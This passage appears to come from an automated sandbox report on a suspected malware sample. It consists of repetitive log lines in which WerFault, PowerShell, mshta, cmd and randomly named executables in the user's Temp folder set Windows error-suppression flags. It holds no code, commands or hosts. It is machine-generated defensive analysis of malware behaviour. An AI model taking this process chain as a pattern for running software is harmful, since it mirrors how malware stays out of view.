Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1085378101\9db7f37142.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process information set: NOOPENFILEERRORBOX
